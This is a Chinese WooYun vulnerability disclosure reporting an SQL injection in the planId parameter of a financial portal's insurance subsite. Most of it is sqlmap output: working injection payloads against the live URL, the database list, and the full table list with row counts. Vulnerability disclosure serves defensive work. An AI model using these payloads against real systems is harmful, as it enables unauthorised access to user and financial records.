当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160991

漏洞标题:金融之家分站存在漏洞 导致数据泄露

相关厂商:金融之家

漏洞作者: 路人甲

提交时间:2015-12-14 19:53

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点

http://baoxian.jrzj.com/index.php?m=insurance&c=index&a=viewpdf&planId=516


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: planId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND 3000=3000
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND (SELECT 6795 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(6795=6795,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND (SELECT * FROM (SELECT(SLEEP(5)))EKRg)
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: m=insurance&c=index&a=viewpdf&planId=-4701 UNION ALL SELECT CONCAT(0x71766a6a71,0x6955776b636c63666c45,0x7170717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] jrzj_db2014
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: planId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND 3000=3000
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND (SELECT 6795 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(6795=6795,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=insurance&c=index&a=viewpdf&planId=516 AND (SELECT * FROM (SELECT(SLEEP(5)))EKRg)
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: m=insurance&c=index&a=viewpdf&planId=-4701 UNION ALL SELECT CONCAT(0x71766a6a71,0x6955776b636c63666c45,0x7170717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
Database: jrzj_db2014
[556 tables]
+-----------------------------------+
| bbs_common_admincp_cmenu |
| bbs_common_admincp_group |
| bbs_common_admincp_member |
| bbs_common_admincp_perm |
| bbs_common_admincp_session |
| bbs_common_admingroup |
| bbs_common_adminnote |
| bbs_common_advertisement |
| bbs_common_advertisement_custom |
| bbs_common_banned |
| bbs_common_block |
| bbs_common_block_favorite |
| bbs_common_block_item |
| bbs_common_block_item_data |
| bbs_common_block_permission |
| bbs_common_block_pic |
| bbs_common_block_style |
| bbs_common_block_xml |
| bbs_common_cache |
| bbs_common_card |
| bbs_common_card_log |
| bbs_common_card_type |
| bbs_common_connect_guest |
| bbs_common_credit_log |
| bbs_common_credit_log_details |
| bbs_common_credit_log_field |
| bbs_common_credit_rule |
| bbs_common_credit_rule_log |
| bbs_common_credit_rule_log_field |
| bbs_common_cron |
| bbs_common_devicetoken |
| bbs_common_district |
| bbs_common_diy_data |
| bbs_common_domain |
| bbs_common_failedip |
| bbs_common_failedlogin |
| bbs_common_friendlink |
| bbs_common_grouppm |
| bbs_common_invite |
| bbs_common_magic |
| bbs_common_magiclog |
| bbs_common_mailcron |
| bbs_common_mailqueue |
| bbs_common_member |
| bbs_common_member_action_log |
| bbs_common_member_connect |
| bbs_common_member_count |
| bbs_common_member_crime |
| bbs_common_member_field_forum |
| bbs_common_member_field_home |
| bbs_common_member_forum_buylog |
| bbs_common_member_grouppm |
| bbs_common_member_log |
| bbs_common_member_magic |
| bbs_common_member_medal |
| bbs_common_member_newprompt |
| bbs_common_member_profile |
| bbs_common_member_profile_setting |
| bbs_common_member_security |
| bbs_common_member_secwhite |
| bbs_common_member_stat_field |
| bbs_common_member_status |
| bbs_common_member_validate |
| bbs_common_member_verify |
| bbs_common_member_verify_info |
| bbs_common_member_wechat |
| bbs_common_member_wechatmp |
| bbs_common_myapp |
| bbs_common_myinvite |
| bbs_common_mytask |
| bbs_common_nav |
| bbs_common_onlinetime |
| bbs_common_optimizer |
| bbs_common_patch |
| bbs_common_plugin |
| bbs_common_pluginvar |
| bbs_common_process |
| bbs_common_regip |
| bbs_common_relatedlink |
| bbs_common_remote_port |
| bbs_common_report |
| bbs_common_searchindex |
| bbs_common_seccheck |
| bbs_common_secquestion |
| bbs_common_session |
| bbs_common_setting |
| bbs_common_smiley |
| bbs_common_sphinxcounter |
| bbs_common_stat |
| bbs_common_statuser |
| bbs_common_style |
| bbs_common_stylevar |
| bbs_common_syscache |
| bbs_common_tag |
| bbs_common_tagitem |
| bbs_common_task |
| bbs_common_taskvar |
| bbs_common_template |
| bbs_common_template_block |
| bbs_common_template_permission |
| bbs_common_uin_black |
| bbs_common_usergroup |
| bbs_common_usergroup_field |
| bbs_common_visit |
| bbs_common_word |
| bbs_common_word_type |
| bbs_connect_disktask |
| bbs_connect_feedlog |
| bbs_connect_memberbindlog |
| bbs_connect_postfeedlog |
| bbs_connect_tthreadlog |
| bbs_forum_access |
| bbs_forum_activity |
| bbs_forum_activityapply |
| bbs_forum_announcement |
| bbs_forum_attachment |
| bbs_forum_attachment_0 |
| bbs_forum_attachment_1 |
| bbs_forum_attachment_2 |
| bbs_forum_attachment_3 |
| bbs_forum_attachment_4 |
| bbs_forum_attachment_5 |
| bbs_forum_attachment_6 |
| bbs_forum_attachment_7 |
| bbs_forum_attachment_8 |
| bbs_forum_attachment_9 |
| bbs_forum_attachment_exif |
| bbs_forum_attachment_unused |
| bbs_forum_attachtype |
| bbs_forum_bbcode |
| bbs_forum_collection |
| bbs_forum_collectioncomment |
| bbs_forum_collectionfollow |
| bbs_forum_collectioninvite |
| bbs_forum_collectionrelated |
| bbs_forum_collectionteamworker |
| bbs_forum_collectionthread |
| bbs_forum_creditslog |
| bbs_forum_debate |
| bbs_forum_debatepost |
| bbs_forum_faq |
| bbs_forum_filter_post |
| bbs_forum_forum |
| bbs_forum_forum_threadtable |
| bbs_forum_forumfield |
| bbs_forum_forumrecommend |
| bbs_forum_groupcreditslog |
| bbs_forum_groupfield |
| bbs_forum_groupinvite |
| bbs_forum_grouplevel |
| bbs_forum_groupuser |
| bbs_forum_hotreply_member |
| bbs_forum_hotreply_number |
| bbs_forum_imagetype |
| bbs_forum_jijin_hb_info |
| bbs_forum_jijin_info |
| bbs_forum_jijin_kf_info |
| bbs_forum_medal |
| bbs_forum_medallog |
| bbs_forum_memberrecommend |
| bbs_forum_moderator |
| bbs_forum_modwork |
| bbs_forum_newthread |
| bbs_forum_onlinelist |
| bbs_forum_order |
| bbs_forum_poll |
| bbs_forum_polloption |
| bbs_forum_polloption_image |
| bbs_forum_pollvoter |
| bbs_forum_post |
| bbs_forum_post_location |
| bbs_forum_post_moderate |
| bbs_forum_post_tableid |
| bbs_forum_postcache |
| bbs_forum_postcomment |
| bbs_forum_postlog |
| bbs_forum_poststick |
| bbs_forum_promotion |
| bbs_forum_qh_info |
| bbs_forum_ratelog |
| bbs_forum_relatedthread |
| bbs_forum_replycredit |
| bbs_forum_rsscache |
| bbs_forum_sign |
| bbs_forum_sofa |
| bbs_forum_spacecache |
| bbs_forum_statlog |
| bbs_forum_stock_info |
| bbs_forum_thread |
| bbs_forum_thread_moderate |
| bbs_forum_threadaddviews |
| bbs_forum_threadcalendar |
| bbs_forum_threadclass |
| bbs_forum_threadclosed |
| bbs_forum_threaddisablepos |
| bbs_forum_threadhidelog |
| bbs_forum_threadhot |
| bbs_forum_threadimage |
| bbs_forum_threadlog |
| bbs_forum_threadmod |
| bbs_forum_threadpartake |
| bbs_forum_threadpreview |
| bbs_forum_threadprofile |
| bbs_forum_threadprofile_group |
| bbs_forum_threadrush |
| bbs_forum_threadtype |
| bbs_forum_trade |
| bbs_forum_tradecomment |
| bbs_forum_tradelog |
| bbs_forum_typeoption |
| bbs_forum_typeoptionvar |
| bbs_forum_typevar |
| bbs_forum_warning |
| bbs_fundaccount |
| bbs_home_album |
| bbs_home_album_category |
| bbs_home_appcreditlog |
| bbs_home_blacklist |
| bbs_home_blog |
| bbs_home_blog_category |
| bbs_home_blog_moderate |
| bbs_home_blogfield |
| bbs_home_class |
| bbs_home_click |
| bbs_home_clickuser |
| bbs_home_comment |
| bbs_home_comment_moderate |
| bbs_home_docomment |
| bbs_home_doing |
| bbs_home_doing_moderate |
| bbs_home_favorite |
| bbs_home_feed |
| bbs_home_feed_app |
| bbs_home_follow |
| bbs_home_follow_feed |
| bbs_home_follow_feed_archiver |
| bbs_home_friend |
| bbs_home_friend_request |
| bbs_home_friendlog |
| bbs_home_notic_set |
| bbs_home_notification |
| bbs_home_pic |
| bbs_home_pic_moderate |
| bbs_home_picfield |
| bbs_home_poke |
| bbs_home_pokearchive |
| bbs_home_share |
| bbs_home_share_moderate |
| bbs_home_show |
| bbs_home_specialuser |
| bbs_home_userapp |
| bbs_home_userappfield |
| bbs_home_visitor |
| bbs_mobile_setting |
| bbs_mobile_wechat_authcode |
| bbs_mobile_wsq_threadlist |
| bbs_portal_article_content |
| bbs_portal_article_count |
| bbs_portal_article_moderate |
| bbs_portal_article_related |
| bbs_portal_article_title |
| bbs_portal_article_trash |
| bbs_portal_attachment |
| bbs_portal_category |
| bbs_portal_category_permission |
| bbs_portal_comment |
| bbs_portal_comment_moderate |
| bbs_portal_rsscache |
| bbs_portal_topic |
| bbs_portal_topic_pic |
| bbs_security_evilpost |
| bbs_security_eviluser |
| bbs_security_failedlog |
| bbs_ucenter_admins |
| bbs_ucenter_applications |
| bbs_ucenter_badwords |
| bbs_ucenter_domains |
| bbs_ucenter_failedlogins |
| bbs_ucenter_feeds |
| bbs_ucenter_friends |
| bbs_ucenter_mailqueue |
| bbs_ucenter_memberfields |
| bbs_ucenter_members |
| bbs_ucenter_mergemembers |
| bbs_ucenter_newpm |
| bbs_ucenter_notelist |
| bbs_ucenter_pm_indexes |
| bbs_ucenter_pm_lists |
| bbs_ucenter_pm_members |
| bbs_ucenter_pm_messages_0 |
| bbs_ucenter_pm_messages_1 |
| bbs_ucenter_pm_messages_2 |
| bbs_ucenter_pm_messages_3 |
| bbs_ucenter_pm_messages_4 |
| bbs_ucenter_pm_messages_5 |
| bbs_ucenter_pm_messages_6 |
| bbs_ucenter_pm_messages_7 |
| bbs_ucenter_pm_messages_8 |
| bbs_ucenter_pm_messages_9 |
| bbs_ucenter_protectedmembers |
| bbs_ucenter_settings |
| bbs_ucenter_sqlcache |
| bbs_ucenter_tags |
| bbs_ucenter_vars |
| jrzj_BalanceByFundId |
| jrzj_BalanceByFundId_data |
| jrzj_BondsInvestDetail |
| jrzj_BondsInvestDetail_data |
| jrzj_CostAnalysisByFundId |
| jrzj_CostAnalysisByFundId_data |
| jrzj_FinIdxByInnerCode |
| jrzj_FinIdxByInnerCode_data |
| jrzj_FundProspectusList |
| jrzj_FundProspectusList_data |
| jrzj_IAnalysisByFundId |
| jrzj_IAnalysisByFundId_data |
| jrzj_Loan |
| jrzj_Loan_data |
| jrzj_ProfieByFundId |
| jrzj_ProfieByFundId_data |
| jrzj_QuarterReportList |
| jrzj_QuarterReportList_data |
| jrzj_admin |
| jrzj_admin_panel |
| jrzj_admin_role |
| jrzj_admin_role_priv |
| jrzj_annotation |
| jrzj_annotation_data |
| jrzj_announce |
| jrzj_app |
| jrzj_app_data |
| jrzj_attachment |
| jrzj_attachment_index |
| jrzj_badword |
| jrzj_block |
| jrzj_block_history |
| jrzj_block_priv |
| jrzj_business_info |
| jrzj_business_info_data |
| jrzj_cache |
| jrzj_card_order |
| jrzj_card_order_data |
| jrzj_category |
| jrzj_category_priv |
| jrzj_cerdit |
| jrzj_cerdit_adinfo |
| jrzj_cerdit_data |
| jrzj_collect_shuju |
| jrzj_collection_content |
| jrzj_collection_history |
| jrzj_collection_node |
| jrzj_collection_program |
| jrzj_comment |
| jrzj_comment_check |
| jrzj_comment_data_1 |
| jrzj_comment_logs |
| jrzj_comment_setting |
| jrzj_comment_table |
| jrzj_content_check |
| jrzj_copyfrom |
| jrzj_credit_applyers_info |
| jrzj_cyy |
| jrzj_datacall |
| jrzj_dbsource |
| jrzj_download |
| jrzj_download_data |
| jrzj_downservers |
| jrzj_email_code |
| jrzj_exponent |
| jrzj_extend_setting |
| jrzj_favorite |
| jrzj_form_jrzj_feedback |
| jrzj_form_jrzj_identity |
| jrzj_fund |
| jrzj_fundAnnounceList |
| jrzj_fundAnnounceList_data |
| jrzj_fundAssetList |
| jrzj_fundAssetList_data |
| jrzj_fundBasicInfo |
| jrzj_fundBasicInfo_data |
| jrzj_fundChagRateList |
| jrzj_fundChagRateList_data |
| jrzj_fundManager |
| jrzj_fundManager_data |
| jrzj_fundSeatTranList |
| jrzj_fundSeatTranList_data |
| jrzj_fundStkAccumBuy |
| jrzj_fundStkAccumBuy_data |
| jrzj_fundStkAccumSell |
| jrzj_fundStkAccumSell_data |
| jrzj_fundStkDetailList |
| jrzj_fundStkDetailList_data |
| jrzj_fundUnitChngList |
| jrzj_fundUnitChngList_data |
| jrzj_fundYearReportList |
| jrzj_fundYearReportList_data |
| jrzj_fund_cityListByProvince |
| jrzj_fund_data |
| jrzj_fund_holdshare |
| jrzj_fund_order |
| jrzj_fund_provincelist |
| jrzj_fund_topic |
| jrzj_fund_topic_data |
| jrzj_hits |
| jrzj_induSumConfList |
| jrzj_induSumConfList_data |
| jrzj_insurance_contacts |
| jrzj_insurance_contacts_data |
| jrzj_insurance_contract |
| jrzj_insurance_contract_data |
| jrzj_insurance_details |
| jrzj_insurance_details_data |
| jrzj_insure_info |
| jrzj_insure_info_data |
| jrzj_ip |
| jrzj_ipbanned |
| jrzj_iphone |
| jrzj_ips |
| jrzj_keylink |
| jrzj_keyword |
| jrzj_keyword_data |
| jrzj_link |
| jrzj_linkage |
| jrzj_live |
| jrzj_live_data |
| jrzj_loan_order |
| jrzj_loan_order_data |
| jrzj_log |
| jrzj_member |
| jrzj_member_detail |
| jrzj_member_group |
| jrzj_member_menu |
| jrzj_member_verify |
| jrzj_member_vip |
| jrzj_menu |
| jrzj_message |
| jrzj_message_data |
| jrzj_message_group |
| jrzj_mobile_push_date |
| jrzj_model |
| jrzj_model_field |
| jrzj_module |
| jrzj_mood |
| jrzj_new_collect |
| jrzj_new_collect_data |
| jrzj_news |
| jrzj_news_data |
| jrzj_operaQuotaList |
| jrzj_operaQuotaList_data |
| jrzj_operating_loan |
| jrzj_operating_loan_data |
| jrzj_page |
| jrzj_pay_account |
| jrzj_pay_payment |
| jrzj_pay_spend |
| jrzj_peizi |
| jrzj_peizi_account |
| jrzj_peizi_account_data |
| jrzj_peizi_add_deposit |
| jrzj_peizi_add_deposit_data |
| jrzj_peizi_clear |
| jrzj_peizi_clear_data |
| jrzj_peizi_config |
| jrzj_peizi_count_num |
| jrzj_peizi_data |
| jrzj_peizi_deposit |
| jrzj_peizi_deposit_data |
| jrzj_peizi_message |
| jrzj_peizi_message_data |
| jrzj_peizi_order |
| jrzj_peizi_order_data |
| jrzj_peizi_userinfo |
| jrzj_peizi_userinfo_data |
| jrzj_peizi_water |
| jrzj_peizi_water_data |
| jrzj_peizi_withdraw |
| jrzj_peizi_withdraw_1 |
| jrzj_peizi_withdraw_1_data |
| jrzj_peizi_withdraw_data |
| jrzj_periodList |
| jrzj_periodList_data |
| jrzj_phone_collect |
| jrzj_picture |
| jrzj_picture_data |
| jrzj_position |
| jrzj_position_data |
| jrzj_poster |
| jrzj_poster_201404 |
| jrzj_poster_201405 |
| jrzj_poster_201406 |
| jrzj_poster_201407 |
| jrzj_poster_201408 |
| jrzj_poster_201409 |
| jrzj_poster_201410 |
| jrzj_poster_201411 |
| jrzj_poster_201412 |
| jrzj_poster_201501 |
| jrzj_poster_201502 |
| jrzj_poster_201503 |
| jrzj_poster_201504 |
| jrzj_poster_201505 |
| jrzj_poster_201506 |
| jrzj_poster_201507 |
| jrzj_poster_201508 |
| jrzj_poster_201509 |
| jrzj_poster_201510 |
| jrzj_poster_201511 |
| jrzj_poster_space |
| jrzj_product_help |
| jrzj_product_help_data |
| jrzj_push |
| jrzj_push_data |
| jrzj_queryFundDivList |
| jrzj_queryFundDivList_data |
| jrzj_queue |
| jrzj_release_point |
| jrzj_search |
| jrzj_search_keyword |
| jrzj_sendemail |
| jrzj_session |
| jrzj_site |
| jrzj_site_notice |
| jrzj_site_notice_data |
| jrzj_site_pic |
| jrzj_site_pic_data |
| jrzj_sms_report |
| jrzj_special |
| jrzj_special_c_data |
| jrzj_special_content |
| jrzj_sphinx_counter |
| jrzj_sso_admin |
| jrzj_sso_applications |
| jrzj_sso_members |
| jrzj_sso_messagequeue |
| jrzj_sso_session |
| jrzj_sso_settings |
| jrzj_tag |
| jrzj_template_bak |
| jrzj_times |
| jrzj_transfer_record |
| jrzj_type |
| jrzj_updatetime |
| jrzj_urlrule |
| jrzj_video |
| jrzj_video_content |
| jrzj_video_data |
| jrzj_video_store |
| jrzj_vote_data |
| jrzj_vote_option |
| jrzj_vote_subject |
| jrzj_wap |
| jrzj_wap_type |
| jrzj_workflow |
| jrzj_youku_vedio |
| jrzj_youku_vedio_data |
| weixin_zhifu |
+-----------------------------------+
Database: jrzj_db2014
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| bbs_forum_statlog | 2096755 |
| jrzj_ips | 889691 |
| jrzj_ip | 710450 |
| jrzj_exponent | 564031 |
| jrzj_periodList | 382163 |
| jrzj_log | 215395 |
| jrzj_hits | 141215 |
| jrzj_fundStkDetailList | 128300 |
| jrzj_BondsInvestDetail | 114998 |
| jrzj_induSumConfList | 107972 |
| jrzj_keyword_data | 100707 |
| jrzj_fundSeatTranList | 95362 |
| jrzj_attachment | 72561 |
| jrzj_attachment_index | 70120 |
| bbs_common_district | 45051 |
| jrzj_search | 36704 |
| jrzj_news_data | 32207 |
| jrzj_news | 32206 |
| jrzj_fundAnnounceList_data | 30921 |
| jrzj_fundAnnounceList | 30429 |
| jrzj_mobile_push_date | 28453 |
| jrzj_QuarterReportList_data | 22950 |
| bbs_common_credit_log_details | 20202 |
| jrzj_fundUnitChngList | 17834 |
| jrzj_fundStkAccumBuy | 16227 |
| jrzj_fundStkAccumSell | 16025 |
| jrzj_FinIdxByInnerCode | 13278 |
| jrzj_QuarterReportList | 12179 |
| jrzj_fundAssetList | 11913 |
| jrzj_fundChagRateList | 11245 |
| jrzj_keyword | 11010 |
| jrzj_position_data | 8370 |
| jrzj_BalanceByFundId | 7881 |
| bbs_forum_post | 7679 |
| jrzj_CostAnalysisByFundId | 7595 |
| jrzj_IAnalysisByFundId | 7595 |
| jrzj_ProfieByFundId | 7595 |
| jrzj_credit_applyers_info | 7054 |
| jrzj_iphone | 6192 |
| bbs_forum_forumfield | 5818 |
| bbs_forum_thread | 5570 |
| jrzj_operaQuotaList | 5541 |
| bbs_forum_forum | 5500 |
| jrzj_fundYearReportList | 5381 |
| jrzj_fundYearReportList_data | 5377 |
| bbs_forum_sofa | 4737 |
| jrzj_queryFundDivList | 4189 |
| bbs_common_credit_rule_log | 3649 |
| jrzj_linkage | 3537 |
| jrzj_annotation | 2981 |
| jrzj_annotation_data | 2981 |
| bbs_forum_attachment | 2874 |
| bbs_forum_stock_info | 2664 |
| jrzj_FundProspectusList | 2649 |
| bbs_home_notification | 2637 |
| bbs_ucenter_memberfields | 2595 |
| bbs_common_member_count | 2580 |
| bbs_forum_sign | 2406 |
| bbs_forum_threadaddviews | 2201 |
| bbs_forum_filter_post | 2168 |
| bbs_ucenter_members | 2029 |
| bbs_common_member_field_forum | 2025 |
| bbs_common_member_field_home | 2024 |
| bbs_common_member_status | 2024 |
| bbs_common_member_profile | 2023 |
| bbs_common_member | 2017 |
| bbs_forum_jijin_kf_info | 1998 |
| jrzj_model_field | 1839 |
| bbs_common_member_newprompt | 1550 |
| bbs_home_notic_set | 1448 |
| bbs_forum_threadimage | 1434 |
| jrzj_live | 1344 |
| jrzj_live_data | 1344 |
| bbs_forum_threadpartake | 1334 |
| jrzj_fund | 1304 |
| jrzj_cerdit | 1138 |
| jrzj_cerdit_data | 1138 |
| jrzj_card_order_data | 1124 |
| bbs_fundaccount | 962 |
| jrzj_comment_data_1 | 890 |
| bbs_common_onlinetime | 842 |
| jrzj_card_order | 824 |
| jrzj_fundManager | 763 |
| bbs_ucenter_failedlogins | 751 |
| jrzj_form_jrzj_feedback | 721 |
| jrzj_category_priv | 638 |
| jrzj_fundBasicInfo | 603 |
| jrzj_product_help | 603 |
| jrzj_product_help_data | 603 |
| jrzj_Loan | 598 |
| jrzj_Loan_data | 598 |
| bbs_ucenter_pm_indexes | 505 |
| bbs_home_friend_request | 480 |
| jrzj_operating_loan | 462 |
| jrzj_operating_loan_data | 462 |
| jrzj_peizi_order | 450 |
| bbs_common_setting | 433 |
| jrzj_peizi_account | 427 |
| bbs_forum_newthread | 426 |
| jrzj_menu | 423 |
| bbs_forum_attachment_unused | 416 |
| jrzj_member_detail | 406 |
| bbs_common_stat | 402 |
| jrzj_sso_members | 400 |
| bbs_forum_jijin_info | 398 |
| jrzj_member | 396 |
| jrzj_updatetime | 375 |
| jrzj_push_data | 353 |
| bbs_forum_jijin_hb_info | 329 |
| jrzj_comment_logs | 310 |
| bbs_forum_attachment_0 | 275 |
| jrzj_peizi_water | 273 |
| bbs_forum_modwork | 271 |
| bbs_forum_attachment_7 | 269 |
| bbs_common_member_grouppm | 263 |
| bbs_forum_post_tableid | 263 |
| bbs_forum_attachment_3 | 259 |
| bbs_forum_attachment_1 | 256 |
| jrzj_push | 255 |
| bbs_forum_attachment_2 | 254 |
| bbs_forum_rsscache | 254 |
| jrzj_admin_role_priv | 251 |
| bbs_forum_attachment_9 | 247 |
| jrzj_insurance_details | 244 |
| jrzj_insurance_details_data | 244 |
| jrzj_youku_vedio | 240 |
| jrzj_youku_vedio_data | 240 |
| bbs_forum_attachment_6 | 237 |
| bbs_forum_attachment_8 | 234 |
| bbs_forum_attachment_5 | 230 |
| bbs_home_favorite | 225 |
| bbs_forum_threadmod | 223 |
| jrzj_peizi_userinfo | 206 |
| bbs_common_smiley | 205 |
| bbs_forum_attachment_4 | 201 |
| jrzj_sso_messagequeue | 200 |
| jrzj_comment | 193 |
| jrzj_fund_order | 191 |
| jrzj_collect_shuju | 165 |
| jrzj_insure_info_data | 157 |
| jrzj_insure_info | 149 |
| jrzj_peizi_clear | 125 |
| bbs_ucenter_pm_messages_3 | 122 |
| bbs_forum_thread_moderate | 121 |
| bbs_ucenter_pm_members | 114 |
| jrzj_business_info | 114 |
| jrzj_business_info_data | 114 |
| bbs_common_syscache | 112 |
| jrzj_cerdit_adinfo | 110 |
| jrzj_peizi_message | 110 |
| jrzj_fund_holdshare | 108 |
| jrzj_mood | 104 |
| bbs_common_block_style | 103 |
| jrzj_insurance_contract | 99 |
| jrzj_peizi_withdraw | 98 |
| jrzj_cyy | 94 |
| bbs_forum_forumrecommend | 93 |
| jrzj_category | 93 |
| bbs_common_member_action_log | 91 |
| jrzj_message_data | 89 |
| jrzj_cache | 88 |
| jrzj_peizi_deposit | 81 |
| jrzj_transfer_record | 77 |
| bbs_forum_threadcalendar | 74 |
| jrzj_link | 71 |
| jrzj_favorite | 70 |
| jrzj_loan_order_data | 70 |
| jrzj_new_collect | 68 |
| jrzj_new_collect_data | 68 |
| bbs_common_admincp_perm | 67 |
| bbs_ucenter_pm_messages_8 | 65 |
| bbs_ucenter_notelist | 64 |
| jrzj_content_check | 63 |
| jrzj_model | 63 |
| bbs_ucenter_pm_messages_5 | 60 |
| bbs_ucenter_pm_lists | 57 |
| bbs_common_nav | 53 |
| bbs_common_member_profile_setting | 51 |
| bbs_forum_moderator | 51 |
| bbs_ucenter_pm_messages_6 | 48 |
| bbs_ucenter_pm_messages_0 | 47 |
| jrzj_email_code | 47 |
| bbs_common_stylevar | 45 |
| bbs_common_word | 44 |
| bbs_forum_qh_info | 44 |
| bbs_ucenter_pm_messages_7 | 44 |
| bbs_ucenter_pm_messages_1 | 42 |
| jrzj_phone_collect | 41 |
| jrzj_insurance_contacts_data | 37 |
| bbs_common_tag | 35 |
| bbs_common_optimizer | 34 |
| jrzj_copyfrom | 34 |
| jrzj_module | 34 |
| bbs_common_credit_rule | 32 |
| bbs_common_usergroup | 32 |
| bbs_common_usergroup_field | 32 |
| bbs_ucenter_newpm | 32 |
| bbs_ucenter_pm_messages_2 | 32 |
| jrzj_fund_cityListByProvince | 31 |
| jrzj_position | 30 |
| bbs_common_grouppm | 29 |
| bbs_ucenter_settings | 27 |
| jrzj_peizi_add_deposit | 27 |
| bbs_ucenter_pm_messages_4 | 25 |
| bbs_common_member_crime | 24 |
| bbs_common_statuser | 23 |
| jrzj_insurance_contacts | 22 |
| jrzj_loan_order | 22 |
| jrzj_site_pic_data | 21 |
| jrzj_type | 21 |
| bbs_common_cron | 20 |
| bbs_common_tagitem | 20 |
| bbs_forum_polloption | 20 |
| bbs_ucenter_pm_messages_9 | 19 |
| jrzj_site_pic | 19 |
| jrzj_fund_topic | 18 |
| jrzj_fund_topic_data | 18 |
| jrzj_pay_account | 17 |
| jrzj_urlrule | 17 |
| bbs_forum_onlinelist | 16 |
| bbs_home_click | 15 |
| jrzj_admin | 14 |
| bbs_common_failedlogin | 12 |
| bbs_common_plugin | 12 |
| bbs_common_credit_log | 10 |
| bbs_common_credit_log_field | 10 |
| bbs_forum_medal | 10 |
| bbs_forum_pollvoter | 10 |
| bbs_forum_threadhot | 10 |
| bbs_forum_hotreply_member | 8 |
| jrzj_admin_role | 8 |
| jrzj_peizi_count_num | 8 |
| bbs_common_admingroup | 7 |
| bbs_forum_threaddisablepos | 7 |
| jrzj_member_group | 7 |
| jrzj_peizi_config | 7 |
| bbs_common_admincp_cmenu | 6 |
| bbs_forum_typeoption | 6 |
| bbs_home_pokearchive | 6 |
| jrzj_poster | 6 |
| jrzj_poster_space | 6 |
| bbs_common_admincp_group | 5 |
| bbs_forum_hotreply_number | 5 |
| jrzj_app_data | 5 |
| jrzj_form_jrzj_identity | 5 |
| jrzj_sso_settings | 5 |
| bbs_common_admincp_member | 4 |
| bbs_forum_bbcode | 4 |
| bbs_forum_imagetype | 4 |
| bbs_forum_poll | 4 |
| bbs_forum_post_moderate | 4 |
| bbs_home_follow | 4 |
| jrzj_poster_201404 | 4 |
| jrzj_workflow | 4 |
| bbs_forum_grouplevel | 3 |
| jrzj_member_menu | 3 |
| jrzj_sendemail | 3 |
| bbs_common_block | 2 |
| bbs_common_diy_data | 2 |
| bbs_common_template_block | 2 |
| bbs_common_word_type | 2 |
| bbs_forum_polloption_image | 2 |
| bbs_home_friend | 2 |
| bbs_home_poke | 2 |
| bbs_mobile_setting | 2 |
| bbs_ucenter_applications | 2 |
| jrzj_admin_panel | 2 |
| jrzj_app | 2 |
| jrzj_keylink | 2 |
| bbs_common_admincp_session | 1 |
| bbs_common_cache | 1 |
| bbs_common_credit_rule_log_field | 1 |
| bbs_common_failedip | 1 |
| bbs_common_session | 1 |
| bbs_common_style | 1 |
| bbs_common_template | 1 |
| bbs_forum_poststick | 1 |
| bbs_forum_replycredit | 1 |
| bbs_forum_threadprofile | 1 |
| bbs_forum_threadtype | 1 |
| bbs_home_friendlog | 1 |
| bbs_ucenter_admins | 1 |
| jrzj_announce | 1 |
| jrzj_comment_setting | 1 |
| jrzj_comment_table | 1 |
| jrzj_fund_provincelist | 1 |
| jrzj_peizi_withdraw_1 | 1 |
| jrzj_site | 1 |
| jrzj_sso_admin | 1 |
| jrzj_sso_applications | 1 |
| jrzj_wap | 1 |
+-----------------------------------+---------+


1.png


2.png


3.png

漏洞证明:

1.png


2.png


3.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝